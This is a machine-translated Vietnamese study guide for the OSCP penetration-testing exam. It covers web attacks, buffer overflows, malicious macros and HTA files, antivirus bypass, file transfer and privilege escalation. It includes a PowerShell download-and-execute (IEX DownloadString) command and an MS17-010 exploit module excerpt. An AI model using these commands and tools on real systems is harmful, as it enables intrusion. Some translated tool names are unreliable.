- Hướng dẫn chính thức của Nmap: Tôi sử dụng trang này nhiều hơn các trang man. Tôi thực sự khuyên bạn nên mua cuốn sách đầy đủ vì hướng dẫn chính thức còn thiếu một vài chương, chẳng hạn như “Phát hiện và lật đổ tường lửa và hệ thống phát hiện xâm nhập”, “Tối ưu hóa hiệu suất Nmap”, “Kỹ thuật và thuật toán quét cổng”, “Khám phá máy chủ (quét Ping )”, và hơn thế nữa. https://nmap.org/book/toc.html
- Liên kết cho Sách quét mạng Nmap (nếu bạn muốn mua nó): https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717
- Nmap Scripting Engine (NSE): https://nmap.org/book/man-nse.html
- Blog Nmap của ZephrFish: https://blog.zsec.uk/nmap-rtfm/
Masscan: Một công cụ mạnh mẽ có thể được sử dụng để quét một tập hợp các cổng được yêu cầu chống lại các mục tiêu của bạn. Như Robert Graham nói “điều này có thể được thực hiện trong vòng chưa đầy 6 phút với tốc độ khoảng 10 triệu gói tin mỗi giây”.
Daniel Miessler hướng dẫn sử dụng Masscan: https://danielmiessler.com/study/masscan/
Danh sách dịch vụ:
Có rất nhiều dịch vụ đang chạy trên rất nhiều hệ thống… hãy dành thời gian để hiểu chúng! Đừng chỉ quét chúng và tiếp tục. Hãy dành chút thời gian để xem xét từng thứ vì chúng có thể là chìa khóa để bạn có được quyền truy cập shell trên một hệ thống!
Abatchy đã cung cấp một liên kết từ bảo mật 0-day cho tôi rất nhiều ý tưởng và những điều cần tìm kiếm mà tôi có thể đã bỏ qua khi bỏ qua một số dịch vụ trong phòng thí nghiệm. Liên kết ban đầu đã chết nhưng bạn có thể tìm thấy các bản sao của nó trên máy quay lại: https://web.archive.org/web/20200309204648/http://0daysecurity.com/penetration-testing/enumeration.html
Phần 8: Quét lỗ hổng bảo mật
Tôi không dành quá nhiều thời gian cho phần này để chuẩn bị vì trình quét lỗ hổng rất đơn giản và dễ cấu hình. Ngoài ra, mục đích của máy quét lỗ hổng là xác định các lỗ hổng bảo mật trong các dịch vụ hoặc trong hệ điều hành. Những máy quét này dựa trên cơ sở dữ liệu có chứa thông tin cần thiết cần thiết để tiến hành quét. Một lời cảnh báo! Hãy cẩn thận khi bạn sử dụng trình quét lỗ hổng bảo mật trên các mục tiêu của mình vì có khả năng một số plugin hoặc tính năng có thể gây ảnh hưởng đến mục tiêu của bạn, chẳng hạn như gỡ bỏ dịch vụ đó, khóa tài khoản người dùng và thậm chí làm hỏng hệ thống.
Bản cập nhật thay thế OpenVAS và học sinh sẽ học cách sử dụng Nessus. Nessus ổn định hơn trên Kali Linux và nó có giao diện đơn giản. Tôi cũng có thể sử dụng khóa Nessus Essential cho hầu hết các thử nghiệm của mình và để giúp tôi làm quen với cách hoạt động của các trình quét lỗ hổng này. Nessus là một công cụ thực sự phổ biến để quét lỗ hổng trong thế giới infosec và tôi chắc chắn khuyến khích bạn chơi với nó!
Để biết hướng dẫn về cách cài đặt Nessus trên Kali Linux, bạn có thể tìm thấy nó tại đây: https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux
Để có được khóa Nessus, bạn có thể lấy tại đây: https://www.tenable.com/products/nessus/nessus-essentials
Phần 9: Các cuộc tấn công ứng dụng web
Tôi đã quay lại phần này và tôi thực sự thích cách OffSec dành thời gian để đi sâu hơn về cách bạn nên xây dựng phương pháp đánh giá web của mình. Sau khi tất cả các ứng dụng web bắt đầu trở nên phổ biến hơn để xem trên các bản pentest.
Là một pentester, bạn cần thu thập thông tin về ứng dụng web. Ví dụ, bạn nên tự hỏi mình những câu hỏi sau:
- Mục đích của ứng dụng là gì?
- Ứng dụng web được viết bằng ngôn ngữ nào?
- Ứng dụng web đang chạy phiên bản nào?
- Ứng dụng web được lưu trữ như thế nào?
- Ứng dụng web có kết nối với cơ sở dữ liệu không? Nếu có; phần mềm mà cơ sở dữ liệu đang sử dụng là gì và nó là phiên bản nào?
Việc xác định các thành phần của ứng dụng web sẽ cho phép bạn tiến hành giai đoạn tiếp theo bằng cách liệt kê các thành phần / vấn đề bạn đã xác định thay vì chạy một cách mù quáng khai thác ứng dụng web. Như mọi khi, liệt kê là điều mà những kẻ tấn công phải tiếp tục thực hiện khi xem xét tất cả các cách thức tấn công có thể làm tổn hại đến ứng dụng web.
Những điều cần kiểm tra khi bạn đang liệt kê một ứng dụng web:
Xem lại các URL:
- Phần mở rộng tệp
- các tuyến đường
- thư mục web ẩn (sơ đồ trang web như robot.txt hoặc sitemap.xml)
- cổng không tiêu chuẩn
Xem lại nội dung của trang web:
- Luôn luôn xem lại mã nguồn của trang web!
- Kiểm tra mọi yếu tố để xem ứng dụng web hoạt động như thế nào
- Xem lại các tiêu đề yêu cầu và phản hồi để hiểu ứng dụng web hoạt động như thế nào khi bạn thực hiện một số hành động nhất định đối với nó.
- Kiểm tra bảng điều khiển dành cho quản trị viên (Ví dụ: các ứng dụng WordPress sẽ có một thư mục / quản trị viên có thể được sử dụng để truy cập Bảng điều khiển dành cho quản trị viên WordPress)
Các công cụ để tìm các lỗ hổng trên web và tiến hành các cuộc tấn công web:
Máy quét thư mục web:
Các công cụ này được thiết kế để cấu trúc trang web brute force bao gồm các thư mục và tệp trong trang web. Những công cụ này có thể xác định các cấu trúc thư mục ẩn hoặc các trang web có thể hữu ích khi bạn ở trong phòng thí nghiệm hoặc trong quá trình đánh giá của bạn. Mỗi công cụ được liệt kê đều có những ưu điểm / nhược điểm riêng tùy thuộc vào việc bạn đang cố gắng sử dụng chúng để làm gì.
- DIRB: http://dirb.sourceforge.net/
- Tìm kiếm: https://github.com/maurosoria/dirsearch
- Dirbuster: https://tools.kali.org/web-application/dirbuster
- Gobuster: https://github.com/OJ/gobuster
- Wfuzz: https://github.com/xmendez/wfuzz
- ffuf: https://github.com/ffuf/ffuf
BurpSuite:
Một trình quét lỗ hổng ứng dụng web phổ biến có chứa nhiều tính năng và plugin để xác định các lỗ hổng web trên một số ứng dụng web nhất định. Công cụ này sử dụng một proxy chặn kết nối với trình duyệt của bạn để định tuyến lưu lượng truy cập thông qua ứng dụng proxy Burp Suite. Khi proxy chặn được cấu hình, bạn có thể bắt đầu nắm bắt và phân tích từng yêu cầu đến và đi từ ứng dụng web mục tiêu. Với các yêu cầu đã thu thập của luận án, người kiểm tra thâm nhập có thể phân tích, thao tác và làm mờ các yêu cầu HTTP riêng lẻ để xác định các tham số tiềm năng hoặc các điểm tiêm theo cách thủ công.
Tài nguyên BurpSuite:
- Đào tạo ợ hơi từ Ý tưởng an toàn: https://www.youtube.com/playlist?list=PLqG-wtrX3aA_wYTrnDHoCBkKBoI4z9oLd
- Đại học Bugcrowd có một hội thảo trên web mà Jason Haddix đã tạo để giải thích về bộ phần mềm ợ và cách bạn có thể sử dụng nó. Bạn có thể tìm thấy bản ghi âm này tại đây: https://www.bugcrowd.com/resource/introduction-to-burp-suite/
Nikto (Tạo bởi Chris Sullo & tautology0):
Máy quét máy chủ web thực hiện các bài kiểm tra toàn diện đối với máy chủ web cho nhiều mục. Công cụ này có thể quét các lỗ hổng trên ứng dụng web, kiểm tra cấu hình máy chủ bao gồm nhiều tệp chỉ mục, tùy chọn máy chủ HTTP và sẽ cố gắng xác định phiên bản đã cài đặt của máy chủ web và bất kỳ plugin / phần mềm nào đang chạy trên nó. Xin lưu ý rằng công cụ này có thể rất ồn khi quét máy chủ web mục tiêu.
Liên kết: https://cirt.net/Nikto2
HTTPIe https://httpie.io/ :
Một công cụ được thiết kế để kiểm tra, gỡ lỗi và tương tác chung với các API và máy chủ HTTP. Các lệnh http
& https
cho phép tạo và gửi các yêu cầu HTTP tùy ý.
Khai thác các Lỗ hổng dựa trên Web phổ biến:
Khai thác bảng điều khiển dành cho quản trị viên:
Khi bảng điều khiển đăng nhập quản trị được để lộ, những kẻ tấn công có thể dễ dàng xâm nhập trang web đó hơn đáng kể, tùy thuộc vào bảo mật và quyền mà nhà phát triển / ứng dụng web đã triển khai. Với tư cách là pentesters, chúng tôi có thể thực hiện các kỹ thuật như cưỡng bức, đăng nhập bằng thông tin xác thực bị xâm phạm / lấy thông tin xác thực hoặc trong trường hợp hệ thống chưa được vá, truy cập bằng cách khai thác trang đăng nhập quản trị.
Trong trường hợp bạn muốn xem một số ví dụ, bạn có thể tìm thấy nhiều sách trắng này trên Cơ sở dữ liệu khai thác: https://www.exploit-db.com/search?q=Authentication+Bypass
Ví dụ:
- Hệ thống tuyển sinh tự động CASAP: https://www.exploit-db.com/exploits/49463
- Hệ thống đặt phòng khách sạn trực tuyến 1.0 https://www.exploit-db.com/exploits/49420
- Hệ thống quản lý cựu sinh viên 1.0 https://www.exploit-db.com/exploits/48883
- tập lệnh trên nhiều trang web (XSS):
OWASP: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
- Các lỗ hổng truyền tải thư mục:
OWASP: https://owasp.org/www-community/attacks/Path_Traversal
- Lỗ hổng bao gồm tệp. Metaploit Unleashed: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/ Kiểm tra OSWAP cho LFI: https://owasp.org/www-project-web-security-testing-guide/ mới nhất / 4-Web_Application_Security_Testing / 07-Input_Validation_Testing / 11.1-Testing_for_Local_File_Inclusion
- SQL Injjection: OWASP: https://www.owasp.org/index.php/SQL_Injection
- Pentest Monkey SQL Cheat Sheets: http://pentestmonkey.net/category/cheat-sheet/sql-injection
Các công cụ SQL Injection: Tôi không khuyên bạn nên sử dụng các công cụ này cho đến khi bạn hiểu rõ về Cơ sở dữ liệu SQL và cách thức hoạt động của SQL Injection. Các công cụ dưới đây giúp dễ dàng tự động hóa quy trình tiến hành SQL Injection nhưng có thể chúng có thể gây ra sự cố cho Cơ sở dữ liệu SQL mục tiêu. Dưới đây là danh sách các công cụ mà tôi đã sử dụng để hiểu rõ hơn về cách bạn có thể tự động hóa SQL Injjection:
- SQLmap: https://github.com/sqlmapproject/sqlmap/wiki/Usag
- NoSQLMap: https://github.com/codingo/NoSQLMap
Thực hiện các lĩnh vực để cải thiện kỹ năng tấn công web của bạn:
- Metasploitable 2: Chứa các dịch vụ web dễ bị tổn thương như Multidae và Ứng dụng web dễ bị tổn thương (DVWA) mà bạn có thể sử dụng để cải thiện kỹ năng web của mình.
Link tải máy: https://metasploit.help.rapid7.com/docs/metasploitable-2
Liên kết dự phòng: https://www.vulnhub.com/entry/metasploitable-2,29/
- Hướng dẫn khai thác: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
- OWASP Juice Shop: Một ứng dụng web dễ bị tấn công khác chứa nhiều thách thức để cải thiện kỹ năng web của bạn. https://www.owasp.org/index.php/OWASP_Juice_Shop_Project
- Overthewire Natas: Một tập hợp các thử thách trò chơi chiến tranh là nền tảng web mà bạn sẽ cần phải hoàn thành để chuyển sang vòng tiếp theo. Tôi thực sự thích những thử thách của họ khi tôi thực hiện chúng! http://overthewire.org/wargames/natas/
- Học viện An ninh Web: Tác giả của Sổ tay Ứng dụng Web. Trang web này chứa nhiều thách thức thực tế về các Cuộc tấn công ứng dụng web: https://portswigger.net/web-security
- Các tài nguyên khác: Hack Trang web này: https://www.hackthissite.org/
Phần 10: Tràn bộ đệm trên Windows và Linux
Phần yêu thích của tôi để tìm hiểu về! Tài liệu được cung cấp trong PWK rất tuyệt vời và thực sự đơn giản. Trên khắp internet, bạn có thể sẽ tìm thấy nhiều tài nguyên khác nhau để giúp bạn hiểu cách hoạt động của lỗi tràn bộ đệm. Với điều đó đã được nói, tôi sẽ cung cấp một số ghi chú và tài nguyên của tôi để giúp tôi hiểu cách bộ đệm bị tràn.
Corelan Team: Một lời kêu gọi rất lớn đối với những người này vì các bài báo của họ từ bảo mật thông tin đến khai thác phát triển là hoàn toàn đáng kinh ngạc! Họ có một bài viết mà họ đã đăng về Tràn dựa trên ngăn xếp giúp tôi hiểu rõ hơn về việc xác định tràn bộ đệm trong một ứng dụng:
- Phần 1: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- Phần 2: https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
Sau khi đọc xong các bài báo, tôi quyết định bắt đầu xem các bài viết và diễn đàn nơi mọi người xác định thủ công lỗi tràn bộ đệm trong một số ứng dụng nhất định. Với những hướng dẫn này, tôi đã sử dụng Exploit-DB để kiểm tra xem họ có ứng dụng dễ bị tấn công trong nhiều trường hợp hay không. Tôi sẽ không cung cấp bất kỳ hướng dẫn nào trong số này nhưng ít nhất tôi sẽ cung cấp các tệp nhị phân mà bạn có thể sử dụng để xác định lỗi tràn bộ đệm theo cách thủ công.
- Windows Binaries (Khuyên bạn nên chạy những điều này trên Windows 7 / XP 32 bit):
- Vulnserver: https://samsclass.info/127/proj/vuln-server.htm
- Minishare 1.4.1: https://www.exploit-db.com/exploits/636
- Savant Web Server 3.1: https://www.exploit-db.com/exploits/10434
- Freefloat FTP Server 1.0: https://www.exploit-db.com/exploits/40673
- Máy chủ Core FTP 1.2: https://www.exploit-db.com/exploits/39480
- WarFTP 1.65: https://www.exploit-db.com/exploits/3570
- VUPlayer 2.4.9: https://www.exploit-db.com/exploits/40018
Binaries Linux:
- Tràn bộ đệm Linux: https://samsclass.info/127/proj/lbuf1.htm
Hộp dễ bị tổn thương (Vulnhub):
- Brainpan 1: https://www.vulnhub.com/entry/brainpan-1,51/
- Pinky’s Palace phiên bản 1: https://www.vulnhub.com/entry/pinkys-palace-v1,225/
- Stack Overflows cho người mới bắt đầu: https://www.vulnhub.com/entry/stack-overflows-for-beginners-101,290/
- SmashTheTux: https://www.vulnhub.com/entry/smashthetux-101,138/
- Hộp Pandora: https://www.vulnhub.com/entry/pandoras-box-1,111/
Các nguồn lực khác:
- Sách trắng Giới thiệu về Trình gỡ lỗi miễn dịch: https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982
- Do Stack Buffer Overflow Tốt: https://github.com/justinsteven/dostackbufferoverflowgood
- Tràn bộ đệm cho Dummies: https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
- Vortex Stack Buffer Overflow Practice: https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
- Đập chồng để có được niềm vui và lợi nhuận: http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
- Hướng dẫn tràn bộ đệm: https://github.com/johnjhacking/Buffer-Overflow-Guide
- Tràn bộ đệm Linux dựa trên ngăn xếp: https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf
Phần 11: Các cuộc tấn công từ phía Client
Chạy các cuộc tấn công phía máy khách thường yêu cầu sự tương tác của máy khách, vì vậy bạn nên hiểu về cách hoạt động của nó cũng như cách bạn có thể thiết lập nó. Ví dụ: hãy xem Phần tấn công phía máy khách trong Metasploit Unleashed: https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/
Social Engineering là một trong những chiến thuật phổ biến nhất có thể được sử dụng để thực hiện một cuộc tấn công phía máy khách thích hợp. Tùy thuộc vào chiến thuật bạn sử dụng và thông tin bạn thu thập được để lên kế hoạch cho cuộc tấn công này, bạn sẽ có cơ hội thành công cao hơn để khách hàng nhấp vào nó. Dưới đây là một số cuộc tấn công phía máy khách thường được sử dụng:
Ứng dụng HTML:
- Tìm hiểu các cuộc tấn công HTA: https://www.trustedsec.com/blog/malicious-htas/
- Tạo tệp HTA với Empire: https://dmcxblue.gitbook.io/red-team-notes/initial-acces/spear-phishing-links/tools
- Mẫu để tạo của riêng bạn: https://github.com/tjnull/OSCP-Stuff/blob/master/Client-Side-Attacks/Template.HTA
Các công cụ để sử dụng cho các cuộc tấn công HTA:
- Demiguise: https://github.com/nccgroup/demiguise
- WeirdHTA: https://github.com/felamos/weirdhta
- SharpShooter: https://github.com/mdsecactivebreach/SharpShooter
Macro Microsoft Office (Maldoc):
- Macro độc hại: https://www.trustedsec.com/blog/malicious-macros-for-script-kiddies/
- Tạo Maldoc của riêng bạn: https://www.pentestpartners.com/security-blog/how-to-create-poisoned-office-documents-for-your-staff-awareness-training-part-1/
- Tạo Macro bị xáo trộn: https://blog.focal-point.com/how-to-build-obfuscated-macros-for-your-next-social-engineering-campaign
Các công cụ giúp bạn tạo Macro của riêng mình:
Tôi sẽ sử dụng những công cụ này để tìm hiểu cách làm của riêng bạn. Hãy sáng tạo khi bạn đang xây dựng Macro của riêng mình vì việc sử dụng các công cụ như thế này sẽ bị AV gắn cờ
- Tiêm MSFVenom Vbscript: https://www.offensive-security.com/metasploit-unleashed/vbscript-infect-methods/
- Macropack: https://github.com/sevagas/macro_pack
- EvilClippy: https://github.com/outflanknl/EvilClippy
Phần 12: Xử lý Khai thác Công cộng
Sẽ đến lúc bạn cần phải sử dụng khai thác công khai trên mục tiêu của mình để xem liệu bạn có thể lấy được shell trên đó hay không. Với cách khai thác đó, bạn có thể cần phải sửa đổi mã shellcode hoặc thậm chí các phần của phần khai thác để phù hợp với hệ thống của bạn để có được kết nối từ mục tiêu của bạn. Một lời khuyên: Hãy lưu ý đến các khai thác mà bạn tải xuống từ công chúng! Mặc dù những khai thác này có thể gây nguy hiểm cho bất kỳ hệ thống nào nhưng chúng cũng có thể gây nguy hiểm cho bạn. Đảm bảo rằng bạn xem lại mã nguồn và kiểm tra việc khai thác trong môi trường chứa trước khi chạy chúng trên hệ thống thực của bạn.
Trước khi bạn tải xuống một bản khai thác công khai, tôi sẽ cho rằng bạn dành chút thời gian để xem lại mã và hiểu những gì mà bản khai thác được cho là thực sự cũng vậy. Nếu bạn không hiểu mã hoạt động như thế nào… hãy làm một số nghiên cứu !!! Tôi hoàn toàn khẳng định rằng bạn có thể tìm thấy bằng chứng về các khái niệm trực tuyến và hướng dẫn sẽ giải thích cách khai thác thực sự hoạt động. Không phải tất cả các khai thác sẽ hoạt động ngay lập tức, bạn sẽ cần phải định cấu hình chúng để đảm bảo chúng có thể quay trở lại hệ thống tấn công của bạn. Nếu bạn không xem lại mã khai thác hoặc thực hiện bất kỳ sửa đổi nào, thì bạn có nguy cơ khai thác sẽ thất bại, làm hỏng hệ thống / dịch vụ mục tiêu của bạn hoặc nó có thể cho phép người dùng khác kết nối vào hệ thống.
Địa điểm để tìm :
- https://www.exploit-db.com/
- https://packetstormsecurity.com/files/tags/exploit/
- https://www.securityfocus.com/
Các công cụ để tìm kiếm khai thác:
- Searchsploit: một công cụ tìm kiếm dòng lệnh cho Exploit-DB
Ví dụ về lệnh:
searchsploit MS-17-010
tìm tất cả các trường hợp / khai thác được liên kết với MS17-010
root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb
: Lệnh -x chuyển đổi cho phép bạn kiểm tra mã khai thác hoặc thông tin về khai thác. Bạn cũng có thể tải các tệp nmap xml lên Searchsploit để nó có thể tìm thấy các cách khai thác có sẵn phù hợp với mục tiêu của bạn.
root@kali:~# searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb
Snippet of the exploit:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',
'Description' => %q{
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
primitive. This will then be used to overwrite the connection session information with as an
Administrator session. From there, the normal psexec payload code execution is done.
Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
named pipe.
Chơi với một số công tắc lệnh khác mà Searchsploit có vì nó sẽ giúp bạn dễ dàng tìm thấy các khai thác trên hộp kali của mình hơn.
- Hướng dẫn sử dụng Searchsploit: https://www.exploit-db.com/searchsploit
Phần 13: Truyền tệp đến mục tiêu của bạn:
Tùy thuộc vào hệ thống mục tiêu mà bạn có được quyền truy cập, bạn có thể không có khả năng chuyển các khai thác hoặc các công cụ khác mà bạn cần sang hệ thống đó. Với điều này đã được nói, bạn sẽ cần phải tìm ra một số kỹ thuật để chuyển các tệp đến và đi từ hệ thống mục tiêu của bạn. Dưới đây là một số hướng dẫn tôi đã sử dụng để hiểu rõ hơn về cách chuyển tệp sang hệ thống Windows và Linux:
Mô-đun Python để chạy các dịch vụ để truyền tệp:
python2 -m SimpleHTTPServer 80
Quay một máy chủ web trong thư mục bạn đang ở trên cổng 80.python3 -m http.server 80
Quay máy chủ web python phiên bản 3.X trong thư mục bạn đang đặt trên cổng 80.python2 -m pyftpdlib -p 21 -w
quay một máy chủ FTP trong thư mục bạn đang đặt trên cổng 21 và nó cho phép truy cập đăng nhập ẩn danh.python3 -m pyftpdlib -p 21 -w
quay một máy chủ FTP Python 3.X trong thư mục bạn đang đặt trên cổng 21 và nó cho phép truy cập đăng nhập ẩn danh.- Máy chủ HTTP đơn giản với khả năng Tải lên: https://github.com/tjnull/OSCP-Stuff/blob/master/Transferring-Files/HTTPServerWithUpload.py
Các công cụ để chuyển tệp trên Windows:
- Powershell: Tải xuống tệp từ máy chủ của bạn:
powershell (New-Object System.Net.WebClient).DownloadFile('https://IP Address/update.exe', 'msi-installer.exe')
Tải xuống tệp và thực thi với Invoke-Expression:powershell IEX (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/msi-installer.exe')
- bitadmin. Công cụ này là một công cụ dòng lệnh mà bạn có thể sử dụng để tạo các công việc tải xuống hoặc tải lên và theo dõi tiến trình của chúng. Bạn có thể tìm thấy các ví dụ về cách sử dụng công cụ này tại đây: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples
- robocopy: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy
- certutil: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
Đối với Windows 10, Server 2016/2019:
wget:
wget http://127.0.0.1/file.exe
wget -O msi-install.exe http://127.0.0.1/file.exe
wget -b http://127.0.0.1/file.exe
wget --ftp-user=User --ftp-password=ftp://127.0.0.1/file.exe -o msi-install.exe
Các công cụ / tài nguyên khác:
- Updog: https://github.com/sc0tfree/updog
- Pwndrop: https://github.com/kgretzky/pwndrop
- Đã đánh thức: Chuyển tệp từ Kali sang máy mục tiêu https://awakened1712.github.io/oscp/oscp-transfer-files/
- Ropnop Chuyển tệp từ Linux sang Windows (sau khai thác): https://blog.ropnop.com/transferring-files-from-kali-to-windows/
Phần 14: Vượt qua chương trình chống vi-rút
Tôi không dành quá nhiều thời gian để tìm hiểu về phần này vì Metasploit có mã hóa (encoder) để vượt qua hầu hết các chương trình chống vi-rút (ít nhất là các phiên bản cũ hơn). Khóa học PWK khá ổn về phần này.
Các công cụ để bypass Anti-Virus :
- Veil-Framework: https://github.com/Veil-Framework/Veil
- Shellter: https://www.shellterproject.com/
- Unicorn https://github.com/trustedsec/unicorn
- UniByAV: https://github.com/Mr-Un1k0d3r/UniByAv
Các công cụ để chơi với Obfuscation:
PowerShell:
- Gọi-Obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation
- Chimera: https://github.com/tokyoneon/Chimera
Python:
- Pyarmor: https://pypi.org/project/pyarmor/
- PyObfx: https://github.com/PyObfx/PyObfx
NS#:
- ConfuserEx: https://github.com/yck1509/ConfuserEx
Kiểm tra tải trọng công khai. (Hãy nhớ rằng việc gửi mẫu của bạn tới máy quét trực tuyến có thể được phân phối cho các công cụ AV khác):
- Nodistribute: https://nodistribute.com/
- Virustotal: https://www.virustotal.com/gui/home
- Phân tích kết hợp: https://www.hybrid-analysis.com/
- Any-Run: https://app.any.run
- Reverse.it: https://reverse.it
- Công cụ Chống Virus Evasion: https://github.com/govolution/avet
- DefenderCheck: https://github.com/matterpreter/DefenderCheck
- ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
Phần 15: Nâng cấp đặc quyền
Trong phần này, bạn sẽ có một loạt các kỹ thuật để có được quyền truy cập quản trị từ khai thác hạt nhân hoặc thông qua một dịch vụ được định cấu hình sai. Khả năng là vô tận và hãy đảm bảo rằng bạn tìm thấy những khả năng phù hợp với mình. Để hiểu về phần này, tôi khuyên bạn nên áp dụng kiến thức của mình thông qua Vulnhub hoặc Hackthebox để cải thiện kỹ năng của mình trong lĩnh vực này. Tôi biết có những tập lệnh để tự động hóa quy trình này nhưng tại một số thời điểm, những tập lệnh đó có thể bỏ sót điều gì đó rất quan trọng đối với mục tiêu của bạn mà bạn cần nâng cao đặc quyền của mình. Vài điều bạn cần lưu ý: D.
Đối với phần này, tôi sẽ chia thành hai phần: Kỹ thuật leo thang đặc quyền của Windows và Linux.
Hướng dẫn leo thang đặc quyền của Windows:
- Fuzzysecurity Nguyên tắc cơ bản về leo thang đặc quyền của Windows: fuzzysec đã dành thời gian viết bài này vì đây là một hướng dẫn tuyệt vời sẽ giúp bạn hiểu các kỹ thuật leo thang đặc quyền trong Windows. http://www.fuzzysecurity.com/tutorials/16.html
- Lệnh nâng cấp đặc quyền của Pwnwiki Windows: http://pwnwiki.io/#!privesc/windows/index.md
- Blog bảo mật của Absolomb: Hướng dẫn nâng cấp đặc quyền của Windows https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- Pentest.blog: Phương pháp nâng cấp đặc quyền của Windows cho Pentesters https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- SharpAllTheThings: https://github.com/N7WEra/SharpAllTheThings
- LOLBAS (Được tạo bởi Oddvar Moe): https://lolbas-project.github.io/
Công cụ leo thang đặc quyền của Windows:
- JAWS (Tạo bởi 411Hall): Một tập lệnh liệt kê cửa sổ thú vị được viết bằng PowerShell. https://github.com/411Hall/JAWS/commits?author=411Hall
- Đề xuất Khai thác Windows Thế hệ tiếp theo: https://github.com/bitsadmin/wesng
- Sherlock (Tạo bởi RastaMouse): Một tập lệnh PowerShell thú vị khác để tìm các bản vá phần mềm còn thiếu cho các kỹ thuật leo thang đặc quyền cục bộ trong Windows. https://github.com/rasta-mouse/Sherlock
- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- Watson: https://github.com/rasta-mouse/Watson
- Dây an toàn: https://github.com/GhostPack/Seatbelt
- Bất lực: https://github.com/M4ximuss/Powerless
- Powerview: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Thao tác mã thông báo:
- Khoai tây hư : https://github.com/breenmachine/RottenPotatoNG
- Juicy Potato: https://github.com/ohpe/juicy-potato
Các tài nguyên khác dành cho kỹ thuật nâng cấp đặc quyền của Windows: https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194
Hướng dẫn leo thang đặc quyền của Linux: Hướng dẫn duy nhất mà tôi có thể đã từng sử dụng để giúp tôi hiểu các kỹ thuật leo thang đặc quyền trong hệ thống Linux là từ bài đăng trên g0tmi1k. Theo quan điểm của tôi, blog này là blog mà mọi người nên có để chuẩn bị cho OSCP. Bạn có thể tìm thấy hướng dẫn của anh ấy tại đây: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
GTFOBins (Tôi phải cảm ơn Ippsec vì đã chia sẻ điều này với tôi): Chứa danh sách các tệp nhị phân Unix được tuyển chọn có khả năng bị kẻ tấn công khai thác để vượt qua các hạn chế bảo mật cục bộ trên hệ thống Linux. https://gtfobins.github.io/
Hướng dẫn về PayloadsAllTheThings Linux Priv Esc: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Công cụ leo thang đặc quyền Linux:
LinEnum: Một trình kiểm tra leo thang đặc quyền tuyệt vời của Linux vẫn được duy trì bởi những người tại rebootuser.com. Bạn có thể tìm thấy công cụ ở đây: https://github.com/rebootuser/LinEnum
- Đề xuất khai thác Linux 2: https://github.com/jondonas/linux-exploit-suggester-2
- LinPEAS: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS]
